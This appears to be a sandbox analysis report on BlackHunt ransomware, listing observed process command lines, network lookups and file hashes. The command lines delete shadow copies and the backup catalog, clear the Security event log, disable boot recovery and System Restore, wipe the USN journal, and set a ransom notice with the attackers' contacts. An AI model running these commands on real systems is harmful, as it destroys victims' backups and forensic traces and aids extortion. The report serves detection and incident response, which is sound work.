"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Security /e:false
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Security
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
C:\Windows\system32\wbadmin.exe
wbadmin.exe delete catalog -quiet
C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled No
C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
C:\Windows\system32\schtasks.exe
SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 5
C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected] ,TELEGRAM:@GotchaDec] " /f
C:\Windows\system32\fsutil.exe
fsutil.exe usn deletejournal /D C:
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
C:\Windows\system32\taskkill.exe
taskkill /IM mshta.exe /f
C:\Windows\system32\notepad.exe
notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 7668 -ip 7668
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7668 -s 1464
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
C:\ProgramData\#BlackHunt_Private.key
| MD5 | 73446c35218e6ae0c89544784ed6ac3c |
| SHA1 | f394cd41f1dff525d25bfbfb2d1d904a2112da54 |
| SHA256 | 87c9c27392b63318cbf789bae1474ab9887f0bdaeda89184213a609387759a58 |
| SHA512 | fb66882775d7f97a8f1df621922af4c405830ecab21dcf676024b42b6cbd450d53c51a00953eb9d5c4410e476b6c7f0c0cf91ee1db1ec2060f2e1fcc7625a67a |
C:\ProgramData\#BlackHunt_ReadMe.hta
| MD5 | e309e86aa475bf9ab6d9ec368d40fe5a |
| SHA1 | 3db62b6572867604cd091a6c518c4458308d002e |
| SHA256 | 39c0d064e4419607fa2a3b96691440bb9613e7cf28be9476dbe6c644f07a13d2 |
| SHA512 | 5d89c38896f51b2e05f3f0a209054cefe770823b929f4ed9c1275df9aaef58b44dae482a3483c295098423a0652672774797ab869dc67967b31af3dfdb151583 |
C:\ProgramData\#BlackHunt_ReadMe.txt
| MD5 | 88d5b995bf93732281a24ffa8c40ab5c |
| SHA1 | ed0d8cb268e450141673338e131ff2bd97f8b23c |
| SHA256 | 69ffdd2db3a73f5a41ba2d4b25d27661112a80f2d403112b11f53454ad5fb5c1 |
| SHA512 | ea7a88abc7583e6e50d08b8711fd93bf4d79137e68922c614c9e3ed47fdc0bfae113acd6693ffdbf24dd8c966e667ccee9bb3d958ef28fcbb4aceb9db3ef071e |